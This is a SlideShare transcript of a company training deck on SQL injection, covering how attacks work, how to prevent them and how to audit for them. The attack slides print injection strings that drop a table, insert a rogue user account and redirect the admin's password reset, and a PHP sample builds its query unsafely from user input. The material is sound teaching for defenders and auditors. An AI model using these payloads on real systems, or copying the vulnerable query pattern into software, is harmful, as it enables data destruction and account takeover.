SlideShare une entreprise Scribd logo
1  sur  22
Télécharger pour lire hors ligne
Injection Attacks
Executing, Preventing, and Auditing
What is an Injection Attack?
  • Exploits weak application level security around the “system” type
    ID

  • Exploit allows the client, a.k.a. attacker, to “piggyback” code into
    a web page, and have the “system” ID execute it for them

  • Can both execute commands and insert / update / delete data




Conversys Technologies PVT. Ltd.
What is the Danger?
  • Typically “system” IDs have “all access” rights to the
    database

  • When exploited, the attacker can do anything the “system”
    ID can

  • Utilizes no special equipment or advanced knowledge




Conversys Technologies PVT. Ltd.
Industry
  Joint study by the US department of Commerce and Visa
  Ranked as one of the top 5 greatest data security vulnerabilities

  “SQL injection is a technique used to exploit Web-based
  applications by using client-supplied data in SQL queries. SQL
  injection attacks are caused primarily by applications that lack input
  validation checks. Recently, commercial shopping cart products
  have been the focus of attack by hackers who seek account
  information. PCI DSS Requirement 6.5 requires that Web-facing
  applications be developed in accordance with secure coding
  guidelines to guard against such attacks. “




Conversys Technologies PVT. Ltd.
Different Types of Code Injection

• SQL Injection (Most prevalent)


• LDAP Injection


• XML Injection


• Others......



    * Flaw is not code specific, rather in the web application it is embedded in




 Conversys Technologies PVT. Ltd.
Structure of Web Based Systems


  • Application logic– Typically built with a scripting language
    (php, jsp, asp), a lightweight tool that interfaces with the
    data source and controls the behavior of the program

  • Data Source – Typically a database, but could also be a
    flat file, XML file, or another application

  • The interface between the application and data source is
    typically done with an embedded language. Embedded
    systems integrate one type of code into another (such as a
    php script executing SQL commands)


Conversys Technologies PVT. Ltd.
How does it work?

  Review on Client-Server Architecture
  You (client) request a web page
  Server responds with the page, as displayed on the client computer
  Client enters data
  Server takes data, runs server side script, queries database, returns results




Conversys Technologies PVT. Ltd.
What really happens when you search?



  Server has a prewritten SQL query stored in a script
  select item, picture, from ItemDB where description = ‘$client_input’;

  You input “american psycho 1st”




  Prewritten script is then executed by “system” as :
  select item, picture, from ItemDB where description = “american                                         psycho 1st”;



  Please Note: You just used the “system” ID to execute a query that YOU wrote. In practice, most “system” ID’s have DBA level
  access, and are only restricted by the logic built into the application itself.




Conversys Technologies PVT. Ltd.
Code Example
<?PHP
session_start();
header("Cache-control: private"); // IE 6 Fix.
error_reporting(E_ALL);
?>
<html>
<body bgcolor = white>
<?php
$email = $_SESSION['email']; // Variable holding user’s email address
$value = stripslashes($_POST['newdata']); // Variable holding data entered
$fieldname = $_POST['type']; // Variable holding fieldname to update
if ($_SESSION['access_rights'] == 1)
{
$db = mysql_connect("localhost", "system_id", “password"); // Connects to local DB
mysql_select_db("payroll",$db); // selects database to query
$query = "update data SET $fieldname='$value' WHERE email = '$email'"; // Prewritten Query
$result = mysql_query($query,$db); // executes query
echo "<META HTTP-EQUIV='Refresh' CONTENT='0; URL=return.php'>";
}
?>




 Conversys Technologies PVT. Ltd.
How can we exploit this?
SQL Query Stored in Application:

         select item, picture, from ItemDB where description = ‘$client_input’

To commit a SQL Injection Attack, enter into the web site form:

                                   x‘;drop table ‘ItemDB

         The query executed by the “System” ID will now be:

         select item, picture, from ItemDB where description = ‘x‘;drop table
           ‘ItemDB’

The server just executed the stored query, and we just effectively destroyed the
entire “ItemDB” database!



Conversys Technologies PVT. Ltd.
Even More Fun…
  “Add A New User”

  Canned Query: SELECT email, passwd, login_id, full_name FROM members WHERE
  email = ‘$user_input’;
  SQL Attack: x'; INSERT INTO members ('email', 'passwd', 'login_id', 'full_name')
  VALUES (‘mike@pinch.com',‘mynewPW',‘pinch',‘Mike Pinch')
  System then Executes: SELECT email, passwd, login_id, full_name FROM members
  WHERE email = ‘x'; INSERT INTO members ('email', 'passwd', 'login_id', 'full_name')
  VALUES (‘mike@pinch.com',‘mynewPW',‘pinch',‘Mike Pinch');

  I now have my very own account!




Conversys Technologies PVT. Ltd.
One More for Good Measure
  “Forgot my Password”
  Canned Query: SELECT email, passwd, login_id, full_name FROM members WHERE
  email = ‘$UserInput’;
  SQL Attack: x'; UPDATE members SET email = ‘pinch@CLIENTX.com' WHERE email =
  ‘sysadmin@CLIENTX.com
  System then Executes: SELECT email, passwd, login_id, full_name FROM members
  WHERE email = x'; UPDATE members SET email = ‘pinch@CLIENTX.com' WHERE
  email = ‘sysadmin@CLIENTX.com
  Now just go to forgot my password, type pinch@CLIENTX.com, and the system will
                  conveniently email me the system admin’s password!




Conversys Technologies PVT. Ltd.
Prevention




Conversys Technologies PVT. Ltd.
Error Message Masking

                       •       Bad
                                     •   Good




Conversys Technologies PVT. Ltd.
Error Masking
  • Blocks real error messages from being displayed to the
    client

  • Best Practice
    All specific errors messages are suppressed, either
    through using a generic error message, or blocking them
    altogether.




Conversys Technologies PVT. Ltd.
How are Attacks Prevented?
         Sanitize all input including:
  •      Data collected in Forms through browsers
  •      Data collected in URL’s
  •      Data collected through cookies
  •      White/Black List
  •      Mask Error Messages
  •      Continuous Monitoring
  •      New Technique: SQL Firewalls




Conversys Technologies PVT. Ltd.
Prevalence of Attacks
  • Injection attacks are extremely powerful, almost always
    malicious, and nearly undetectable (until its too late)
  • Danger comes from simplicity – no special hardware or
    software is necessary. Just syntax knowledge and a
    browser!
  • In 2006, 14% of newly released commercial application
    and open source tools were vulnerable to SQL injection
    attacks.
  • A recent study of web sites not masking error messages
    returned a total of 10.3%




Conversys Technologies PVT. Ltd.
Integrating into the Audit
      •      Weak controls related to             •   Cobit Framework
             preventing injection attacks may           – DS 5.3, Identity Management
             require nature, timing and extent    •   “All users (internal, external and temporary)
             of financial statement substantive       and their activity on IT systems (business
             audit procedures.                        application, system operation, development
                                                      and maintenance) should be uniquely
                                                      identifiable. User access rights to systems
                                                      and data should be in line with defined and
      •      Assistance may be needed from            documented business needs and job
             systems or data management               requirements. User access rights are
             professionals to help identify if        requested by user management, approved
             there were instances in which the        by system owner and implemented by the
             control weaknesses were                  security-responsible person. User identities
                                                      and access rights are maintained in a
             exploited.                               central repository. Cost-effective
                                                      technical and procedural measures are
                                                      deployed and kept current to establish
      •      Cobit Framework (See excerpt)            user identification, implement
              – DS 5.3, Identity Management           authentication and enforce access
                                                      rights.”




Conversys Technologies PVT. Ltd.
What Systems are Vulnerable?
  • Predominantly internally developed applications
  • Web based client-server architecture
  • Any system where access is available via the web




Conversys Technologies PVT. Ltd.
How do you determine if a system is vulnerable?
     •      Inquire
             – Do you have database and server error messages masked?
             – Do you have a strategy to sanitize all user input to detect SQL injection
                attacks?
             – Walk me through how your system prevents SQL injection attempts, IE
                filtering input, limiting rights.

     •      Observe
             – Ask client to generate an error message
                  • Should either be generic or non-existent
     •      Inspect
             – Request code sample showing filtering module logic
                  • Should filter out suspicious characters such as “’,/;&%$” etc
                  • View White/Black List

     •      Attack and Penetration Testing




Conversys Technologies PVT. Ltd.
Created and Presented by Krishnendu Paul
  Vice President – Technologies
  Conversys Technologies Pvt. Ltd.
  A Maxelor Company



  References
  http://www.sarbanes-oxley.com/section.php?level=1&pub_id=Sarbanes-Oxley
  http://usa.visa.com/download/business/accepting_visa/ops_risk_management/Top_5_Vulnerabilities
  _Bulletin_August2006.pdf - 2006 Visa USA
  "Applying an improved economic model to software buy-versus-build decisions", Higaki,Wesley.
  Hewlett-Packard Journal, August 1995.
  "Cobit 4.0", IT Governance Institute, 2005
   Mitre Corporation, 2006




Conversys Technologies PVT. Ltd.
Thanks

         Conversys Technologies Pvt. Ltd.

  •      Kolkata Office : 7, Bondel Road, Kolkata, West Bengal India – 700019
                           E-mail:     info@conversys.in
                                    Telephone: +91-33-64602675


  •      Pune Office:              #204, Casa Grande, Lane No. 8. Koregaon Park, Pune - 411 001
                                   Telephone: +91 20 26052014


  •      US Office:                15 Corporate Place, Suite# 333 Piscataway, , NJ, 08854 USA




Conversys Technologies PVT. Ltd.

Contenu connexe

Tendances

Session2-Application Threat Modeling
Session2-Application Threat ModelingSession2-Application Threat Modeling
Session2-Application Threat Modelingzakieh alizadeh
 
20111012 Sap Datasheet Site
20111012 Sap Datasheet Site20111012 Sap Datasheet Site
20111012 Sap Datasheet SiteNicola_Milone
 
Application Security 101 (OWASP DC)
Application Security 101 (OWASP DC)Application Security 101 (OWASP DC)
Application Security 101 (OWASP DC)mikemcbryde
 
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...Security Innovation
 
IT_Security_Service Delivery_Consultant
IT_Security_Service Delivery_Consultant IT_Security_Service Delivery_Consultant
IT_Security_Service Delivery_Consultant Saravanan Purushothaman
 
Secure SDLC for Software
Secure SDLC for Software Secure SDLC for Software
Secure SDLC for Software Shreeraj Shah
 
Enhancing your mobile enterprise security with ibm worklight tips
Enhancing your mobile enterprise security with ibm worklight tipsEnhancing your mobile enterprise security with ibm worklight tips
Enhancing your mobile enterprise security with ibm worklight tipsbupbechanhgmail
 
Discussion Paper: Bugs Tracking
Discussion Paper: Bugs TrackingDiscussion Paper: Bugs Tracking
Discussion Paper: Bugs TrackingDeny Prasetia
 
Top 10 Web App Security Risks
Top 10 Web App Security RisksTop 10 Web App Security Risks
Top 10 Web App Security RisksSperasoft
 
Role based access control
Role based access controlRole based access control
Role based access controlPeter Edwards
 
Access Control Models: Controlling Resource Authorization
Access Control Models: Controlling Resource AuthorizationAccess Control Models: Controlling Resource Authorization
Access Control Models: Controlling Resource AuthorizationMark Niebergall
 
Common Sense Security Framework
Common Sense Security FrameworkCommon Sense Security Framework
Common Sense Security FrameworkJerod Brennen
 
An overview of access control
An overview of access controlAn overview of access control
An overview of access controlElimity
 
Robert donald resume iam 1
Robert donald resume iam 1Robert donald resume iam 1
Robert donald resume iam 1Robert Donald
 
Advanced applications-architecture-threats
Advanced applications-architecture-threatsAdvanced applications-architecture-threats
Advanced applications-architecture-threatsBlueinfy Solutions
 
Implementing role based access control on Web Application (sample case)
Implementing role based access control on Web Application (sample case)Implementing role based access control on Web Application (sample case)
Implementing role based access control on Web Application (sample case)Deny Prasetia
 
Security hole #5 application security science or quality assurance
Security hole #5 application security   science or quality assuranceSecurity hole #5 application security   science or quality assurance
Security hole #5 application security science or quality assuranceTjylen Veselyj
 
Cloud Security vs Security in the Cloud
Cloud Security vs Security in the CloudCloud Security vs Security in the Cloud
Cloud Security vs Security in the CloudTjylen Veselyj
 

Tendances (20)

Session2-Application Threat Modeling
Session2-Application Threat ModelingSession2-Application Threat Modeling
Session2-Application Threat Modeling
 
20111012 Sap Datasheet Site
20111012 Sap Datasheet Site20111012 Sap Datasheet Site
20111012 Sap Datasheet Site
 
Application Security 101 (OWASP DC)
Application Security 101 (OWASP DC)Application Security 101 (OWASP DC)
Application Security 101 (OWASP DC)
 
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
 
IT_Security_Service Delivery_Consultant
IT_Security_Service Delivery_Consultant IT_Security_Service Delivery_Consultant
IT_Security_Service Delivery_Consultant
 
Secure SDLC for Software
Secure SDLC for Software Secure SDLC for Software
Secure SDLC for Software
 
Enhancing your mobile enterprise security with ibm worklight tips
Enhancing your mobile enterprise security with ibm worklight tipsEnhancing your mobile enterprise security with ibm worklight tips
Enhancing your mobile enterprise security with ibm worklight tips
 
Discussion Paper: Bugs Tracking
Discussion Paper: Bugs TrackingDiscussion Paper: Bugs Tracking
Discussion Paper: Bugs Tracking
 
Top 10 Web App Security Risks
Top 10 Web App Security RisksTop 10 Web App Security Risks
Top 10 Web App Security Risks
 
Role based access control
Role based access controlRole based access control
Role based access control
 
Access Control Models: Controlling Resource Authorization
Access Control Models: Controlling Resource AuthorizationAccess Control Models: Controlling Resource Authorization
Access Control Models: Controlling Resource Authorization
 
Secure coding practices
Secure coding practicesSecure coding practices
Secure coding practices
 
Common Sense Security Framework
Common Sense Security FrameworkCommon Sense Security Framework
Common Sense Security Framework
 
An overview of access control
An overview of access controlAn overview of access control
An overview of access control
 
Robert donald resume iam 1
Robert donald resume iam 1Robert donald resume iam 1
Robert donald resume iam 1
 
Advanced applications-architecture-threats
Advanced applications-architecture-threatsAdvanced applications-architecture-threats
Advanced applications-architecture-threats
 
Implementing role based access control on Web Application (sample case)
Implementing role based access control on Web Application (sample case)Implementing role based access control on Web Application (sample case)
Implementing role based access control on Web Application (sample case)
 
Security hole #5 application security science or quality assurance
Security hole #5 application security   science or quality assuranceSecurity hole #5 application security   science or quality assurance
Security hole #5 application security science or quality assurance
 
Cloud Security vs Security in the Cloud
Cloud Security vs Security in the CloudCloud Security vs Security in the Cloud
Cloud Security vs Security in the Cloud
 
Vulnerability manager v1.0
Vulnerability manager v1.0Vulnerability manager v1.0
Vulnerability manager v1.0
 

En vedette

Sql injection attack_analysis_py_vo
Sql injection attack_analysis_py_voSql injection attack_analysis_py_vo
Sql injection attack_analysis_py_voJirka Vejrazka
 
Sql Injection Attacks And Defense Presentatio (1)
Sql Injection Attacks And Defense Presentatio (1)Sql Injection Attacks And Defense Presentatio (1)
Sql Injection Attacks And Defense Presentatio (1)guest32e5cfe
 
Intro to SQL Injection
Intro to SQL InjectionIntro to SQL Injection
Intro to SQL Injectionhon1nbo
 
Sql vulnerability advisory presentation
Sql vulnerability advisory presentationSql vulnerability advisory presentation
Sql vulnerability advisory presentationNicholas Davis
 
An Anatomy of a SQL Injection Attack
An Anatomy of a SQL Injection AttackAn Anatomy of a SQL Injection Attack
An Anatomy of a SQL Injection AttackImperva
 
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSSWeb Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSSIvan Ortega
 
Npc case studies
Npc case studiesNpc case studies
Npc case studiesRon Young
 
Scrum By muhammad shariq
Scrum By muhammad shariqScrum By muhammad shariq
Scrum By muhammad shariqMuhammad Shariq
 
Направления совершенствования 97-ФЗ "Закон о блогерах"
Направления совершенствования 97-ФЗ "Закон о блогерах"Направления совершенствования 97-ФЗ "Закон о блогерах"
Направления совершенствования 97-ФЗ "Закон о блогерах"Nikolay Kamnev
 
Internal Quality Audit Training Islamabad 21 22 oct
Internal Quality Audit Training Islamabad 21 22 octInternal Quality Audit Training Islamabad 21 22 oct
Internal Quality Audit Training Islamabad 21 22 octHasnain Gardezi
 
What's new in digital marketing technology and media - midyear 2014 update
What's new in digital marketing technology and media - midyear 2014 updateWhat's new in digital marketing technology and media - midyear 2014 update
What's new in digital marketing technology and media - midyear 2014 updateProve
 
IBM_EGIC_CorpSlide_150126
IBM_EGIC_CorpSlide_150126IBM_EGIC_CorpSlide_150126
IBM_EGIC_CorpSlide_150126Amr Abou Zaid
 
What can Toastmasters do for you?
What can Toastmasters do for you?What can Toastmasters do for you?
What can Toastmasters do for you?Sheeba Thukral
 
REALTOR Client Retargeting
REALTOR Client RetargetingREALTOR Client Retargeting
REALTOR Client RetargetingDanny Fredericks
 
Sami: Intro, Vision and Action Plan for PMI Islamabad chapter
Sami: Intro, Vision and Action Plan for PMI Islamabad chapterSami: Intro, Vision and Action Plan for PMI Islamabad chapter
Sami: Intro, Vision and Action Plan for PMI Islamabad chapterSami Zafar
 

En vedette (20)

Sql injection attack_analysis_py_vo
Sql injection attack_analysis_py_voSql injection attack_analysis_py_vo
Sql injection attack_analysis_py_vo
 
Sql Injection Attacks And Defense Presentatio (1)
Sql Injection Attacks And Defense Presentatio (1)Sql Injection Attacks And Defense Presentatio (1)
Sql Injection Attacks And Defense Presentatio (1)
 
Web Security
Web SecurityWeb Security
Web Security
 
Intro to SQL Injection
Intro to SQL InjectionIntro to SQL Injection
Intro to SQL Injection
 
Sql vulnerability advisory presentation
Sql vulnerability advisory presentationSql vulnerability advisory presentation
Sql vulnerability advisory presentation
 
An Anatomy of a SQL Injection Attack
An Anatomy of a SQL Injection AttackAn Anatomy of a SQL Injection Attack
An Anatomy of a SQL Injection Attack
 
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSSWeb Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
 
Npc case studies
Npc case studiesNpc case studies
Npc case studies
 
Scrum By muhammad shariq
Scrum By muhammad shariqScrum By muhammad shariq
Scrum By muhammad shariq
 
Направления совершенствования 97-ФЗ "Закон о блогерах"
Направления совершенствования 97-ФЗ "Закон о блогерах"Направления совершенствования 97-ФЗ "Закон о блогерах"
Направления совершенствования 97-ФЗ "Закон о блогерах"
 
Internal Quality Audit Training Islamabad 21 22 oct
Internal Quality Audit Training Islamabad 21 22 octInternal Quality Audit Training Islamabad 21 22 oct
Internal Quality Audit Training Islamabad 21 22 oct
 
Mgmt 557-2
Mgmt 557-2Mgmt 557-2
Mgmt 557-2
 
белянин психостилистика-02-типы-06-смешанные
белянин психостилистика-02-типы-06-смешанныебелянин психостилистика-02-типы-06-смешанные
белянин психостилистика-02-типы-06-смешанные
 
What's new in digital marketing technology and media - midyear 2014 update
What's new in digital marketing technology and media - midyear 2014 updateWhat's new in digital marketing technology and media - midyear 2014 update
What's new in digital marketing technology and media - midyear 2014 update
 
IBM_EGIC_CorpSlide_150126
IBM_EGIC_CorpSlide_150126IBM_EGIC_CorpSlide_150126
IBM_EGIC_CorpSlide_150126
 
What can Toastmasters do for you?
What can Toastmasters do for you?What can Toastmasters do for you?
What can Toastmasters do for you?
 
Testforslide
TestforslideTestforslide
Testforslide
 
REALTOR Client Retargeting
REALTOR Client RetargetingREALTOR Client Retargeting
REALTOR Client Retargeting
 
Sami: Intro, Vision and Action Plan for PMI Islamabad chapter
Sami: Intro, Vision and Action Plan for PMI Islamabad chapterSami: Intro, Vision and Action Plan for PMI Islamabad chapter
Sami: Intro, Vision and Action Plan for PMI Islamabad chapter
 
Gayab
GayabGayab
Gayab
 

Similaire à Injection techniques conversys

Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...IBM Security
 
How to Test for The OWASP Top Ten
 How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top TenSecurity Innovation
 
Solvay secure application layer v2015 seba
Solvay secure application layer v2015   sebaSolvay secure application layer v2015   seba
Solvay secure application layer v2015 sebaSebastien Deleersnyder
 
owasp top 10 security risk categories and CWE
owasp top 10 security risk categories and CWEowasp top 10 security risk categories and CWE
owasp top 10 security risk categories and CWEArun Voleti
 
Web and Mobile Application Security
Web and Mobile Application SecurityWeb and Mobile Application Security
Web and Mobile Application SecurityPrateek Jain
 
The 5 Layers of Security Testing by Alan Koch
The 5 Layers of Security Testing by Alan KochThe 5 Layers of Security Testing by Alan Koch
The 5 Layers of Security Testing by Alan KochQA or the Highway
 
The 5 Layers of Security Testing by Alan Koch
The 5 Layers of Security Testing by Alan KochThe 5 Layers of Security Testing by Alan Koch
The 5 Layers of Security Testing by Alan KochQA or the Highway
 
Pillars of great Azure Architecture
Pillars of great Azure ArchitecturePillars of great Azure Architecture
Pillars of great Azure ArchitectureKarthikeyan VK
 
Securing Applications in the Cloud
Securing Applications in the CloudSecuring Applications in the Cloud
Securing Applications in the CloudSecurity Innovation
 
Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks Ahmed Sherif
 
Develop, Test & Maintain Secure Systems (While Being PCI Compliant)
Develop, Test & Maintain Secure Systems (While Being PCI Compliant)Develop, Test & Maintain Secure Systems (While Being PCI Compliant)
Develop, Test & Maintain Secure Systems (While Being PCI Compliant)Security Innovation
 
OWASP Top 10 List Overview for Web Developers
OWASP Top 10 List Overview for Web DevelopersOWASP Top 10 List Overview for Web Developers
OWASP Top 10 List Overview for Web DevelopersBenjamin Floyd
 
Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelinesZakaria SMAHI
 
For Business's Sake, Let's focus on AppSec
For Business's Sake, Let's focus on AppSecFor Business's Sake, Let's focus on AppSec
For Business's Sake, Let's focus on AppSecLalit Kale
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 
Application Security Testing for Software Engineers: An approach to build sof...
Application Security Testing for Software Engineers: An approach to build sof...Application Security Testing for Software Engineers: An approach to build sof...
Application Security Testing for Software Engineers: An approach to build sof...Michael Hidalgo
 

Similaire à Injection techniques conversys (20)

Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
 
How to Test for The OWASP Top Ten
 How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten
 
Solvay secure application layer v2015 seba
Solvay secure application layer v2015   sebaSolvay secure application layer v2015   seba
Solvay secure application layer v2015 seba
 
owasp top 10 security risk categories and CWE
owasp top 10 security risk categories and CWEowasp top 10 security risk categories and CWE
owasp top 10 security risk categories and CWE
 
Web and Mobile Application Security
Web and Mobile Application SecurityWeb and Mobile Application Security
Web and Mobile Application Security
 
Cyber Security # Lec 5
Cyber Security # Lec 5Cyber Security # Lec 5
Cyber Security # Lec 5
 
Security testing
Security testingSecurity testing
Security testing
 
The 5 Layers of Security Testing by Alan Koch
The 5 Layers of Security Testing by Alan KochThe 5 Layers of Security Testing by Alan Koch
The 5 Layers of Security Testing by Alan Koch
 
The 5 Layers of Security Testing by Alan Koch
The 5 Layers of Security Testing by Alan KochThe 5 Layers of Security Testing by Alan Koch
The 5 Layers of Security Testing by Alan Koch
 
Pillars of great Azure Architecture
Pillars of great Azure ArchitecturePillars of great Azure Architecture
Pillars of great Azure Architecture
 
Securing Applications in the Cloud
Securing Applications in the CloudSecuring Applications in the Cloud
Securing Applications in the Cloud
 
Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks
 
Develop, Test & Maintain Secure Systems (While Being PCI Compliant)
Develop, Test & Maintain Secure Systems (While Being PCI Compliant)Develop, Test & Maintain Secure Systems (While Being PCI Compliant)
Develop, Test & Maintain Secure Systems (While Being PCI Compliant)
 
OWASP Top 10 List Overview for Web Developers
OWASP Top 10 List Overview for Web DevelopersOWASP Top 10 List Overview for Web Developers
OWASP Top 10 List Overview for Web Developers
 
Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelines
 
For Business's Sake, Let's focus on AppSec
For Business's Sake, Let's focus on AppSecFor Business's Sake, Let's focus on AppSec
For Business's Sake, Let's focus on AppSec
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
 
Owasp top 10
Owasp top 10Owasp top 10
Owasp top 10
 
Ethical hacking
Ethical hacking Ethical hacking
Ethical hacking
 
Application Security Testing for Software Engineers: An approach to build sof...
Application Security Testing for Software Engineers: An approach to build sof...Application Security Testing for Software Engineers: An approach to build sof...
Application Security Testing for Software Engineers: An approach to build sof...
 

Dernier

Building Your Own AI Instance (TBLC AI )
Building Your Own AI Instance (TBLC AI )Building Your Own AI Instance (TBLC AI )
Building Your Own AI Instance (TBLC AI )Brian Pichman
 
Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024SkyPlanner
 
Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Adtran
 
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...Aggregage
 
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Will Schroeder
 
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDE
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDEADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDE
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDELiveplex
 
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostKubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostMatt Ray
 
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPAAnypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPAshyamraj55
 
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UbiTrack UK
 
VoIP Service and Marketing using Odoo and Asterisk PBX
VoIP Service and Marketing using Odoo and Asterisk PBXVoIP Service and Marketing using Odoo and Asterisk PBX
VoIP Service and Marketing using Odoo and Asterisk PBXTarek Kalaji
 
AI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity WebinarAI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity WebinarPrecisely
 
Designing A Time bound resource download URL
Designing A Time bound resource download URLDesigning A Time bound resource download URL
Designing A Time bound resource download URLRuncy Oommen
 
Building AI-Driven Apps Using Semantic Kernel.pptx
Building AI-Driven Apps Using Semantic Kernel.pptxBuilding AI-Driven Apps Using Semantic Kernel.pptx
Building AI-Driven Apps Using Semantic Kernel.pptxUdaiappa Ramachandran
 
Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1DianaGray10
 
Cybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxCybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxGDSC PJATK
 
Nanopower In Semiconductor Industry.pdf
Nanopower  In Semiconductor Industry.pdfNanopower  In Semiconductor Industry.pdf
Nanopower In Semiconductor Industry.pdfPedro Manuel
 
UiPath Studio Web workshop series - Day 7
UiPath Studio Web workshop series - Day 7UiPath Studio Web workshop series - Day 7
UiPath Studio Web workshop series - Day 7DianaGray10
 
COMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a WebsiteCOMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a Websitedgelyza
 

Dernier (20)

201610817 - edge part1
201610817 - edge part1201610817 - edge part1
201610817 - edge part1
 
Building Your Own AI Instance (TBLC AI )
Building Your Own AI Instance (TBLC AI )Building Your Own AI Instance (TBLC AI )
Building Your Own AI Instance (TBLC AI )
 
Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024
 
Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™
 
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
 
20150722 - AGV
20150722 - AGV20150722 - AGV
20150722 - AGV
 
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
 
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDE
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDEADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDE
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDE
 
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostKubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
 
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPAAnypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPA
 
